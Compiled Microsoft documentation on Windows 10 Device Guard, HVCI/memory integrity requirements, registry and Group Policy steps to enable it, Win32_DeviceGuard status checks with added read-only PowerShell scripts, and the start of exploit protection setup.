Defender/AllowFullScanRemovableDriveScanning
Policy/DeviceInstallation CSP
Perform a custom scan of a removable device
BitLocker
Windows Information Protection
Device Guard: Windows Defender Application Control and virtualization-based protection of code integrity
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Windows 10 includes a set of hardware and OS technologies that, when configured together, allow enterprises to
"lock down" Windows systems so they operate with many of the properties of mobile devices. In this configuration,
specific technologies work together to restrict devices to only run authorized apps by using a feature called
configurable code integrity, while simultaneously hardening the OS against kernel memory attacks through the use
of virtualization-based protection of code integrity (more specifically, HVCI).
Configurable code integrity policies and HVCI are very powerful protections that can be used separately. However,
when these two technologies are configured to work together, they present a very strong protection capability for
Windows 10 devices. This combined "configuration state" of configurable code integrity and HVCI has been
referred to as Windows Defender Device Guard.
Using configurable code integrity to restrict devices to only authorized apps has these advantages over other
solutions:
1. Configurable code integrity policy is enforced by the Windows kernel itself. As such, the policy takes effect early
in the boot sequence before nearly all other OS code and before traditional antivirus solutions run.
2. Configurable code integrity allows customers to set application control policy not only over code running in user
mode, but also kernel mode hardware and software drivers and even code that runs as part of Windows.
3. Customers can protect the configurable code integrity policy even from local administrator tampering by
digitally signing the policy. This would mean that changing the policy would require both administrative
privilege and access to the organization’s digital signing process, making it extremely difficult for an attacker
with administrative privilege, or malicious software that managed to gain administrative privilege, to alter the
application control policy.
4. The entire configurable code integrity enforcement mechanism can be protected by HVCI, where even if a
vulnerability exists in kernel mode code, the likelihood that an attacker could successfully exploit it is
significantly diminished. Why is this relevant? That’s because an attacker that compromises the kernel would
otherwise have enough privilege to disable most system defenses and override the application control policies
enforced by configurable code integrity or any other application control solution.

(Re-)Introducing Windows Defender Application Control


When we originally designed the configuration state that we have referred to as Windows Defender Device Guard,
we did so with a specific security promise in mind. Although there were no direct dependencies between the two
main OS features of the Device Guard configuration, configurable code integrity and HVCI, we intentionally
focused our discussion around the Device Guard lockdown state you achieve when deploying them together.
However, the use of the term Device Guard to describe this configuration state has unintentionally left an
impression for many IT professionals that the two features were inexorably linked and could not be deployed
separately. Additionally, given that HVCI relies on Windows virtualization-based security, it comes with additional
hardware, firmware, and kernel driver compatibility requirements that some older systems can’t meet.
As a result, many IT Professionals assumed that because some systems couldn't use HVCI, they couldn’t use
configurable code integrity either. But configurable code integrity carries no specific hardware or software
requirements other than running Windows 10, which means many IT professionals were wrongly denied the
benefits of this powerful application control capability.
Since the initial release of Windows 10, the world has witnessed numerous hacking and malware attacks where
application control alone could have prevented the attack altogether. With this in mind, we are discussing and
documenting configurable code integrity as an independent technology within our security stack and giving it a
name of its own: Windows Defender Application Control. We hope this change will help us better communicate
options for adopting application control within an organization.
Does this mean Windows Defender Device Guard configuration state is going away? Not at all. The term Device
Guard will continue to be used as a way to describe the fully locked down state achieved through the use of
Windows Defender Application Control (WDAC), HVCI, and hardware and firmware security features. It also allows
us to work with our OEM partners to identify specifications for devices that are “Device Guard capable” so that our
joint customers can easily purchase devices that meet all of the hardware and firmware requirements of the original
"Device Guard" locked down scenario for Windows 10 based devices.

Related topics
Windows Defender Application Control
Dropping the Hammer Down on Malware Threats with Windows 10’s Windows Defender Device Guard
Driver compatibility with Windows Defender Device Guard in Windows 10
Code integrity
Memory integrity
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Memory integrity is a powerful system mitigation that leverages hardware virtualization and the Windows Hyper-V
hypervisor to protect Windows kernel-mode processes against the injection and execution of malicious or
unverified code. Code integrity validation is performed in a secure environment that is resistant to attack from
malicious software, and page permissions for kernel mode are set and maintained by the Hyper-V hypervisor.
Memory integrity helps block many types of malware from running on computers that run Windows 10 and
Windows Server 2016.
Baseline protections and additional qualifications for virtualization-based protection of code integrity
4/5/2019 • 7 minutes to read

Applies to
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Computers must meet certain hardware, firmware, and software requirements in order to take advantage of all of
the virtualization-based security (VBS) features in Windows Defender Device Guard. Computers lacking these
requirements can still be protected by Windows Defender Application Control (WDAC) policies—the difference is
that those computers will not be as hardened against certain threats.
For example, hardware that includes CPU virtualization extensions and SLAT will be hardened against malware that
attempts to gain access to the kernel, but without protected BIOS options such as “Boot only from internal hard
drive,” the computer could be booted (by a malicious person who has physical access) into an operating system on
bootable media.
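Whether a given computer meets the baseline (64-bit CPU with virtualization extensions and SLAT, UEFI Secure Boot) and whether memory integrity, described in the previous section, is actually running can be read from the device itself. The script below is an added example, not from the Microsoft documentation: it queries the Win32_DeviceGuard CIM class for the VBS state and the security properties the platform reports, and combines that with Get-ComputerInfo and Confirm-SecureBootUEFI. The numeric-code-to-name maps are my reading of the class documentation; treat them as assumptions and confirm against a current reference.

```powershell
# Added example (not from the Microsoft documentation): report whether the
# baseline protections are present on this device and whether memory integrity
# (HVCI) is configured and running, using the Win32_DeviceGuard CIM class.
# The value-to-name maps below are assumptions taken from the class
# documentation; confirm them against a current reference.

$SecurityProperties = @{
    0 = 'None'; 1 = 'Base virtualization support'; 2 = 'Secure Boot'
    3 = 'DMA protection'; 4 = 'Secure memory overwrite'; 5 = 'UEFI code read-only'
    6 = 'SMM security mitigations 1.0'; 7 = 'Mode-based execution control (MBEC)'
}
$SecurityServices = @{
    0 = 'None'; 1 = 'Credential Guard'; 2 = 'Memory integrity (HVCI)'
    3 = 'System Guard Secure Launch'; 4 = 'SMM firmware measurement'
}
$VbsStatus = @{ 0 = 'Not enabled'; 1 = 'Enabled but not running'; 2 = 'Running' }

function Get-VbsReport {
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
    $ci = Get-ComputerInfo -Property OsArchitecture, HyperVisorPresent,
        HyperVRequirementSecondLevelAddressTranslation

    # Confirm-SecureBootUEFI throws on legacy BIOS machines, which fail the
    # baseline anyway; report that as "no Secure Boot".
    $secureBoot = $false
    try { $secureBoot = Confirm-SecureBootUEFI } catch { }

    [pscustomobject]@{
        Is64Bit             = ($ci.OsArchitecture -like '64*')
        # SLAT is reported as $null once a hypervisor is running, so accept either signal.
        SlatAvailable       = ([bool]$ci.HyperVisorPresent -or [bool]$ci.HyperVRequirementSecondLevelAddressTranslation)
        UefiSecureBoot      = [bool]$secureBoot
        VbsStatus           = $VbsStatus[[int]$dg.VirtualizationBasedSecurityStatus]
        AvailableProperties = @($dg.AvailableSecurityProperties | ForEach-Object { $SecurityProperties[[int]$_] })
        RequiredProperties  = @($dg.RequiredSecurityProperties  | ForEach-Object { $SecurityProperties[[int]$_] })
        ConfiguredServices  = @($dg.SecurityServicesConfigured  | ForEach-Object { $SecurityServices[[int]$_] })
        RunningServices     = @($dg.SecurityServicesRunning     | ForEach-Object { $SecurityServices[[int]$_] })
        HvciRunning         = [bool]($dg.SecurityServicesRunning -contains 2)
    }
}

Get-VbsReport | Format-List
```

The gap between ConfiguredServices and RunningServices is the line to watch: HVCI configured by policy but absent from RunningServices usually means a baseline requirement (most often SLAT or a required security property the firmware does not expose) is missing, which is exactly the case the WARNING below is about.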

WARNING
Virtualization-based protection of code integrity may be incompatible with some devices and applications. We strongly
recommend testing this configuration in your lab before enabling virtualization-based protection of code integrity on
production systems. Failure to do so may result in unexpected failures up to and including data loss or a blue screen error
(also called a stop error).

The following tables provide more information about the hardware, firmware, and software required for
deployment of various Windows Defender Device Guard features. The tables describe baseline protections, plus
protections for improved security that are associated with hardware and firmware options available in 2015, 2016,
and 2017.

NOTE
Beginning with Windows 10, version 1607, Trusted Platform Module (TPM 2.0) must be enabled by default on new
computers.

Baseline protections

Baseline protection: Hardware: 64-bit CPU
Description: A 64-bit computer is required for the Windows hypervisor to provide VBS.

Baseline protection: Hardware: CPU virtualization extensions, plus extended page tables
Description: These hardware features are required for VBS. One of the following virtualization extensions:
• VT-x (Intel) or
• AMD-V
And:
• Extended page tables, also called Second Level Address Translation (SLAT).
Security benefits: VBS provides isolation of the secure kernel from the normal operating system. Vulnerabilities and zero-days in the normal operating system cannot be exploited because of this isolation.

Baseline protection: Firmware: UEFI firmware version 2.3.1.c or higher with UEFI Secure Boot
Description: See the System.Fundamentals.Firmware.UEFISecureBoot requirement in the Windows Hardware Compatibility Specifications for Windows 10, version 1809 and Windows Server 2019 - Systems download. You can find previous versions of the Windows Hardware Compatibility Program Specifications and Policies here.
Security benefits: UEFI Secure Boot helps ensure that the device boots only authorized code. This can prevent boot kits and root kits from installing and persisting across reboots.

Baseline protection: Firmware: Secure firmware update process
Description: UEFI firmware must support secure firmware update found under the System.Fundamentals.Firmware.UEFISecureBoot requirement in the Windows Hardware Compatibility Specifications for Windows 10, version 1809 and Windows Server 2019 - Systems download. You can find previous versions of the Windows Hardware Compatibility Program Specifications and Policies here.
Security benefits: UEFI firmware, just like software, can have security vulnerabilities that, when found, need to be patched through firmware updates. Patching helps prevent root kits from getting installed.

Baseline protection: Software: HVCI compatible drivers
Description: See the Filter.Driver.DeviceGuard.DriverCompatibility requirement in the Windows Hardware Compatibility Specifications for Windows 10, version 1809 and Windows Server 2019 - Filter driver download. You can find previous versions of the Windows Hardware Compatibility Program Specifications and Policies here.
Security benefits: HVCI compatible drivers help ensure that VBS can maintain appropriate memory permissions. This increases resistance to bypassing vulnerable kernel drivers and helps ensure that malware cannot run in kernel. Only code verified through code integrity can run in kernel mode.

Baseline protection: Software: Qualified Windows operating system
Description: Windows 10 Enterprise, Windows 10 Education, Windows Server 2016, or Windows 10 IoT Enterprise.
Important: Windows Server 2016 running as a domain controller does not support Windows Defender Credential Guard. Only virtualization-based protection of code integrity is supported in this configuration.
Security benefits: Support for VBS and for management features that simplify configuration of Windows Defender Device Guard.

IMPORTANT
The following tables list additional qualifications for improved security. You can use Windows Defender Device Guard with hardware, firmware, and software that support baseline protections, even if they do not support protections for improved security. However, we strongly recommend meeting these additional qualifications to significantly strengthen the level of security that Windows Defender Device Guard can provide.

Additional qualifications for improved security

The following tables describe additional hardware and firmware qualifications, and the improved security that is available when these qualifications are met.
Additional security qualifications starting with Windows 10, version 1507, and Windows Server 2016, Technical Preview 4

Protection for improved security: Firmware: Securing Boot Configuration and Management
Description:
• BIOS password or stronger authentication must be supported.
• In the BIOS configuration, BIOS authentication must be set.
• There must be support for protected BIOS option to configure list of permitted boot devices (for example, "Boot only from internal hard drive") and boot device order, overriding BOOTORDER modification made by operating system.
• In the BIOS configuration, BIOS options related to security and boot options (list of permitted boot devices, boot order) must be secured to prevent other operating systems from starting and to prevent changes to the BIOS settings.
Security benefits:
• BIOS password or stronger authentication helps ensure that only authenticated Platform BIOS administrators can change BIOS settings. This helps protect against a physically present user with BIOS access.
• Boot order when locked provides protection against the computer being booted into WinRE or another operating system on bootable media.

Additional security qualifications starting with Windows 10, version 1607, and Windows Server 2016

Protection for improved security: Firmware: Hardware Rooted Trust Platform Secure Boot
Description:
• Boot Integrity (Platform Secure Boot) must be supported. See the System.Fundamentals.Firmware.CS.UEFISecureBoot.ConnectedStandby requirement in the Windows Hardware Compatibility Specifications for Windows 10, version 1809 and Windows Server 2019 - Systems download. You can find previous versions of the Windows Hardware Compatibility Program Specifications and Policies here.
• The Hardware Security Test Interface (HSTI) 1.1.a must be implemented. See Hardware Security Testability Specification.
Security benefits:
• Boot Integrity (Platform Secure Boot) from Power-On provides protections against physically present attackers, and defense-in-depth against malware.
• HSTI 1.1.a provides additional security assurance for correctly secured silicon and platform.

Protection for improved security: Firmware: Firmware Update through Windows Update
Description: Firmware must support field updates through Windows Update and UEFI encapsulation update.
Security benefits: Helps ensure that firmware updates are fast, secure, and reliable.

Protection for improved security: Firmware: Securing Boot Configuration and Management
Description:
• Required BIOS capabilities: Ability of OEM to add ISV, OEM, or Enterprise Certificate in Secure Boot DB at manufacturing time.
• Required configurations: Microsoft UEFI CA must be removed from Secure Boot DB. Support for 3rd-party UEFI modules is permitted but should leverage ISV-provided certificates or OEM certificate for the specific UEFI software.
Security benefits:
• Enterprises can choose to allow proprietary EFI drivers/applications to run.
• Removing Microsoft UEFI CA from Secure Boot DB provides full control to enterprises over software that runs before the operating system boots.

Additional security qualifications starting with Windows 10, version 1703

Protection for improved security: Firmware: VBS enablement of NX protection for UEFI runtime services
Description:
• VBS will enable No-Execute (NX) protection on UEFI runtime service code and data memory regions. UEFI runtime service code must support read-only page protections, and UEFI runtime service data must not be executable.
• UEFI runtime service must meet these requirements:
  • Implement UEFI 2.6 EFI_MEMORY_ATTRIBUTES_TABLE. All UEFI runtime service memory (code and data) must be described by this table.
  • PE sections need to be page-aligned in memory (not required in non-volatile storage).
  • The Memory Attributes Table needs to correctly mark code and data as RO/NX for configuration by the OS:
    • All entries must include attributes EFI_MEMORY_RO, EFI_MEMORY_XP, or both.
    • No entries may be left with neither of the above attributes, indicating memory that is both executable and writable. Memory must be either readable and executable or writeable and non-executable.
Notes:
• This only applies to UEFI runtime service memory, and not UEFI boot service memory.
• This protection is applied by VBS on OS page tables.
Please also note the following:
• Do not use sections that are both writeable and executable.
• Do not attempt to directly modify executable system memory.
• Do not use dynamic code.
Security benefits:
• Vulnerabilities in UEFI runtime, if any, will be blocked from compromising VBS (such as in functions like UpdateCapsule and SetVariable).
• Reduces the attack surface to VBS from system firmware.

Protection for improved security: Firmware: Firmware support for SMM protection
Description: The Windows SMM Security Mitigations Table (WSMT) specification contains details of an Advanced Configuration and Power Interface (ACPI) table that was created for use with Windows operating systems that support Windows virtualization-based security (VBS) features.
Security benefits:
• Protects against potential vulnerabilities in UEFI runtime services, if any, which would otherwise be able to compromise VBS (such as in functions like UpdateCapsule and SetVariable).
• Reduces the attack surface to VBS from system firmware.
• Blocks additional security attacks against SMM.
Enable virtualization-based protection of code integrity
4/8/2019 • 9 minutes to read

Applies to
Windows Defender Advanced Threat Protection (Windows Defender ATP)
This topic covers different ways to enable Hypervisor-protected code integrity (HVCI) on Windows 10. Some
applications, including device drivers, may be incompatible with HVCI. This can cause devices or software to
malfunction and in rare cases may result in a blue screen. Such issues may occur after HVCI has been turned on or
during the enablement process itself. If this happens, see Troubleshooting for remediation steps.

NOTE
HVCI works with modern 7th gen CPUs or higher and their equivalent on AMD. The CPU feature Mode Based Execution Control (MBEC) virtualization is required.

TIP
"The Secure Kernel relies on the Mode-Based Execution Control (MBEC) feature, if present in hardware, which enhances the
SLAT with a user/kernel executable bit, or the hypervisor’s software emulation of this feature, called Restricted User Mode
(RUM)." Mark Russinovich and Alex Ionescu. Windows Internals 7th Edition book

HVCI Features
HVCI protects against modification of the Control Flow Guard (CFG) bitmap.
HVCI also ensures that your other trustlets, such as Credential Guard, have a valid certificate.
Modern device drivers must also have an EV (Extended Validation) certificate and should support HVCI.

How to turn on HVCI in Windows 10
To enable HVCI on Windows 10 devices with supporting hardware throughout an enterprise, use any of these
options:
Windows Security app
Microsoft Intune (or another MDM provider)
Group Policy
System Center Configuration Manager
Registry
Windows Security app
HVCI is labeled Memory integrity in the Windows Security app and it can be accessed via Settings > Update &
Security > Windows Security > Device security > Core isolation details > Memory integrity. For more
information, see KB4096339.
Enable HVCI using Intune
Enabling in Intune requires using the Code Integrity node in the AppLocker CSP.
Enable HVCI using Group Policy
1. Use Group Policy Editor (gpedit.msc) to either edit an existing GPO or create a new one.
2. Navigate to Computer Configuration > Administrative Templates > System > Device Guard.
3. Double-click Turn on Virtualization Based Security.
4. Click Enabled and under Virtualization Based Protection of Code Integrity, select Enabled with UEFI lock to ensure HVCI cannot be disabled remotely or select Enabled without UEFI lock.
5. Click Ok to close the editor.
To apply the new policy on a domain-joined computer, either restart or run gpupdate /force in an elevated command prompt.
Use registry keys to enable virtualization-based protection of code integrity
Set the following registry keys to enable HVCI. This provides exactly the same set of configuration options
provided by Group Policy.
IMPORTANT
Among the commands that follow, you can choose settings for Secure Boot and Secure Boot with DMA. In most
situations, we recommend that you choose Secure Boot. This option provides Secure Boot with as much protection as is
supported by a given computer’s hardware. A computer with input/output memory management units (IOMMUs) will
have Secure Boot with DMA protection. A computer without IOMMUs will simply have Secure Boot enabled.
In contrast, with Secure Boot with DMA, the setting will enable Secure Boot—and VBS itself—only on a computer that
supports DMA, that is, a computer with IOMMUs. With this setting, any computer without IOMMUs will not have VBS or
HVCI protection, although it can still have WDAC enabled.
All drivers on the system must be compatible with virtualization-based protection of code integrity; otherwise, your
system may fail. We recommend that you enable these features on a group of test computers before you enable them on
users' computers.

For Windows 10 version 1607 and later

Recommended settings (to enable virtualization-based protection of Code Integrity policies, without UEFI Lock):

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f

If you want to customize the preceding recommended settings, use the following settings.
To enable VBS

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f

To enable VBS and require Secure Boot only (value 1)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f

To enable VBS with Secure Boot and DMA (value 3), in the preceding command, change /d 1 to /d 3.

To enable VBS without UEFI lock (value 0)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f

To enable VBS with UEFI lock (value 1), in the preceding command, change /d 0 to /d 1.

To enable virtualization-based protection of Code Integrity policies

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f

To enable virtualization-based protection of Code Integrity policies without UEFI lock (value 0)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f

To enable virtualization-based protection of Code Integrity policies with UEFI lock (value 1), in the preceding command, change /d 0 to /d 1.

For Windows 10 version 1511 and earlier

Recommended settings (to enable virtualization-based protection of Code Integrity policies, without UEFI Lock):

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "HypervisorEnforcedCodeIntegrity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Unlocked" /t REG_DWORD /d 1 /f

If you want to customize the preceding recommended settings, use the following settings.
To enable VBS (it is always locked to UEFI)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f

To enable VBS and require Secure Boot only (value 1)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f

To enable VBS with Secure Boot and DMA (value 3), in the preceding command, change /d 1 to /d 3.

To enable virtualization-based protection of Code Integrity policies (with the default, UEFI lock)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "HypervisorEnforcedCodeIntegrity" /t REG_DWORD /d 1 /f

To enable virtualization-based protection of Code Integrity policies without UEFI lock

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Unlocked" /t REG_DWORD /d 1 /f

Validate enabled Windows Defender Device Guard hardware-based security features
Windows 10 and Windows Server 2016 have a WMI class for related properties and features: Win32_DeviceGuard. This class can be queried from an elevated Windows PowerShell session by using the following command:

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

NOTE
The Win32_DeviceGuard WMI class is only available on the Enterprise edition of Windows 10.

The output of this command provides details of the available hardware-based security features as well as those
features that are currently enabled.
AvailableSecurityProperties
This field helps to enumerate and report state on the relevant security properties for Windows Defender Device Guard.

VALUE | DESCRIPTION
0 | If present, no relevant properties exist on the device.
1 | If present, hypervisor support is available.
2 | If present, Secure Boot is available.
3 | If present, DMA protection is available.
4 | If present, Secure Memory Overwrite is available.
5 | If present, NX protections are available.
6 | If present, SMM mitigations are available.
7 | If present, Mode Based Execution Control is available.

InstanceIdentifier
A string that is unique to a particular device. Valid values are determined by WMI.

RequiredSecurityProperties
This field describes the required security properties to enable virtualization-based security.

VALUE | DESCRIPTION
0 | Nothing is required.
1 | If present, hypervisor support is needed.
2 | If present, Secure Boot is needed.
3 | If present, DMA protection is needed.
4 | If present, Secure Memory Overwrite is needed.
5 | If present, NX protections are needed.
6 | If present, SMM mitigations are needed.
7 | If present, Mode Based Execution Control is needed.

SecurityServicesConfigured
This field indicates whether the Windows Defender Credential Guard or HVCI service has been configured.

VALUE | DESCRIPTION
0 | No services configured.
1 | If present, Windows Defender Credential Guard is configured.
2 | If present, HVCI is configured.
3 | If present, System Guard Secure Launch is configured.

SecurityServicesRunning
This field indicates whether the Windows Defender Credential Guard or HVCI service is running.

VALUE | DESCRIPTION
0 | No services running.
1 | If present, Windows Defender Credential Guard is running.
2 | If present, HVCI is running.
3 | If present, System Guard Secure Launch is running.

Version
This field lists the version of this WMI class. The only valid value now is 1.0.

VirtualizationBasedSecurityStatus
This field indicates whether VBS is enabled and running.

VALUE | DESCRIPTION
0 | VBS is not enabled.
1 | VBS is enabled but not running.
2 | VBS is enabled and running.

PSComputerName
This field lists the computer name. All valid values for computer name.
Another method to determine the available and enabled Windows Defender Device Guard features is to run
msinfo32.exe from an elevated PowerShell session. When you run this program, the Windows Defender Device
Guard properties are displayed at the bottom of the System Summary section.
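To check what the reg add commands and Group Policy settings above actually produced on a device, here is an added PowerShell example (not from this page or from Microsoft) that reads the DeviceGuard registry values and decodes the Win32_DeviceGuard arrays using the value tables above; the function names and the report layout are this example's own choices.

```powershell
# Added example (not part of the Microsoft docs page): read the DeviceGuard
# registry keys described above and decode the Win32_DeviceGuard WMI class
# into a readable HVCI/VBS status report. Run from an elevated PowerShell
# session on Windows 10 Enterprise / Windows Server 2016 or later.

# Lookup tables taken from the value tables on this page.
$PropertyNames = @{
    0 = 'No relevant properties'
    1 = 'Hypervisor support'
    2 = 'Secure Boot'
    3 = 'DMA protection'
    4 = 'Secure Memory Overwrite'
    5 = 'NX protections'
    6 = 'SMM mitigations'
    7 = 'Mode Based Execution Control'
}
$ServiceNames = @{
    0 = 'No services'
    1 = 'Windows Defender Credential Guard'
    2 = 'HVCI'
    3 = 'System Guard Secure Launch'
}
$VbsStatusNames = @{
    0 = 'VBS is not enabled'
    1 = 'VBS is enabled but not running'
    2 = 'VBS is enabled and running'
}

function Get-DeviceGuardRegistryConfig {
    # Reads the Windows 10 version 1607+ values used in the reg add commands above.
    # A value that has not been set is reported as $null instead of throwing.
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard'
    $hvci = Join-Path $base 'Scenarios\HypervisorEnforcedCodeIntegrity'
    $get = {
        param($path, $name)
        (Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue).$name
    }
    [pscustomobject]@{
        EnableVirtualizationBasedSecurity = & $get $base 'EnableVirtualizationBasedSecurity'
        RequirePlatformSecurityFeatures   = & $get $base 'RequirePlatformSecurityFeatures'
        VbsLocked                         = & $get $base 'Locked'
        HvciEnabled                       = & $get $hvci 'Enabled'
        HvciLocked                        = & $get $hvci 'Locked'
    }
}

function Get-HvciStatus {
    # Same query as shown on this page, then decode the numeric arrays.
    $dg = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
    if (-not $dg) { throw 'Win32_DeviceGuard not available (requires Windows 10 Enterprise).' }

    $available  = @($dg.AvailableSecurityProperties)
    $required   = @($dg.RequiredSecurityProperties)
    $configured = @($dg.SecurityServicesConfigured)
    $running    = @($dg.SecurityServicesRunning)

    # Required properties the platform does not offer: VBS cannot start until these are met.
    $missing = $required | Where-Object { $_ -ne 0 -and $available -notcontains $_ }

    [pscustomobject]@{
        VbsStatus           = $VbsStatusNames[[int]$dg.VirtualizationBasedSecurityStatus]
        AvailableProperties = ($available  | ForEach-Object { $PropertyNames[[int]$_] }) -join ', '
        RequiredProperties  = ($required   | ForEach-Object { $PropertyNames[[int]$_] }) -join ', '
        MissingRequirements = ($missing    | ForEach-Object { $PropertyNames[[int]$_] }) -join ', '
        ServicesConfigured  = ($configured | ForEach-Object { $ServiceNames[[int]$_] })  -join ', '
        ServicesRunning     = ($running    | ForEach-Object { $ServiceNames[[int]$_] })  -join ', '
        HvciConfigured      = $configured -contains 2
        HvciRunning         = $running -contains 2
        Registry            = Get-DeviceGuardRegistryConfig
    }
}

$status = Get-HvciStatus
$status | Format-List

# How to read the report:
#  - HvciConfigured = True, HvciRunning = False and MissingRequirements non-empty:
#      the platform lacks a required property (for example Secure Boot, or Mode
#      Based Execution Control on older CPUs); fix firmware settings before
#      expecting "HVCI is running".
#  - HvciRunning = True and Registry.HvciLocked = 1: the UEFI lock is in place, so
#      HVCI cannot be disabled remotely, only by a physically present administrator.
if ($status.HvciConfigured -and -not $status.HvciRunning) {
    Write-Warning "HVCI is configured but not running. Missing: $($status.MissingRequirements)"
}
```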
Troubleshooting
A. If a device driver fails to load or crashes at runtime, you may be able to update the driver using Device
Manager.
B. If you experience software or device malfunction after using the above procedure to turn on HVCI, but you are
able to log in to Windows, you can turn off HVCI by renaming or deleting the SIPolicy.p7b file from the file location
in step 3 above and then restart your device.
C. If you experience a critical error during boot or your system is unstable after using the above procedure to turn on HVCI, you can recover using the Windows Recovery Environment (Windows RE). To boot to Windows RE, see Windows RE Technical Reference. After logging in to Windows RE, you can turn off HVCI by renaming or deleting the SIPolicy.p7b file from the file location in step 3 above and then restart your device.

How to turn off HVCI on the Windows 10 Fall Creators Update

1. Rename or delete the SIPolicy.p7b file located at C:\Windows\System32\CodeIntegrity.
2. Restart the device.
3. To confirm HVCI has been successfully disabled, open System Information and check Virtualization-based security Services Running, which should now have no value displayed.

HVCI deployment in virtual machines

HVCI can protect a Hyper-V virtual machine, just as it would a physical machine. The steps to enable WDAC are the same from within the virtual machine.
WDAC protects against malware running in the guest virtual machine. It does not provide additional protection from the host administrator. From the host, you can disable WDAC for a virtual machine:

Set-VMSecurity -VMName <VMName> -VirtualizationBasedSecurityOptOut $true

Requirements for running HVCI in Hyper-V virtual machines

The Hyper-V host must run at least Windows Server 2016 or Windows 10 version 1607.
The Hyper-V virtual machine must be Generation 2, and running at least Windows Server 2016 or Windows 10.
HVCI and nested virtualization can be enabled at the same time.
Virtual Fibre Channel adapters are not compatible with HVCI. Before attaching a virtual Fibre Channel Adapter to a virtual machine, you must first opt out of virtualization-based security using Set-VMSecurity.
The AllowFullSCSICommandSet option for pass-through disks is not compatible with HVCI. Before configuring a pass-through disk with AllowFullSCSICommandSet, you must first opt out of virtualization-based security using Set-VMSecurity.
Enable exploit protection
4/24/2019 • 9 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Exploit protection helps protect against malware that uses exploits to infect devices and spread. It consists of a
number of mitigations that can be applied to either the operating system or individual apps.
Many features from the Enhanced Mitigation Experience Toolkit (EMET) are included in exploit protection.
You can also set mitigations to audit mode. Audit mode allows you to test how the mitigations would work (and
review events) without impacting the normal use of the machine.
You can enable each mitigation separately by using any of these methods:
Windows Security app
Microsoft Intune
Mobile Device Management (MDM)
System Center Configuration Manager (SCCM)
Group Policy
PowerShell
They are configured by default in Windows 10.
You can set each mitigation to on, off, or to its default value. Some mitigations have additional options.
You can export these settings as an XML file and deploy them to other machines.

Windows Security app
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the App & browser control tile (or the app icon on the left menu bar) and then click Exploit
protection.
3. Go to Program settings and choose the app you want to apply mitigations to:
a. If the app you want to configure is already listed, click it and then click Edit
b. If the app is not listed, at the top of the list click Add program to customize and then choose how you
want to add the app:
Use Add by program name to have the mitigation applied to any running process with that
name. You must specify a file with an extension. You can enter a full path to limit the mitigation to
only the app with that name in that location.
Use Choose exact file path to use a standard Windows Explorer file picker window to find and
select the file you want.
4. After selecting the app, you'll see a list of all the mitigations that can be applied. Choosing Audit will apply
the mitigation in audit mode only. You will be notified if you need to restart the process or app, or if you
need to restart Windows.
5. Repeat this for all the apps and mitigations you want to configure.
6. Under the System settings section, find the mitigation you want to configure and select one of the
following. Apps that aren't configured individually in the Program settings section will use the settings
configured here:
On by default - The mitigation is enabled for apps that don't have this mitigation set in the app-
specific Program settings section
Off by default - The mitigation is disabled for apps that don't have this mitigation set in the app-
specific Program settings section
Use default - The mitigation is either enabled or disabled, depending on the default configuration that
is set up by Windows 10 installation; the default value (On or Off) is always specified next to the Use
default label for each mitigation
7. Repeat this for all the system-level mitigations you want to configure. Click Apply when you're done
setting up your configuration.
If you add an app to the Program settings section and configure individual mitigation settings there, they will be
honored above the configuration for the same mitigations specified in the System settings section. The following
matrix and examples help to illustrate how defaults work:

ENABLED IN PROGRAM SETTINGS | ENABLED IN SYSTEM SETTINGS | BEHAVIOR
Yes | No | As defined in Program settings
Yes | Yes | As defined in Program settings
No | Yes | As defined in System settings
No | No | Default as defined in Use default option

Example 1
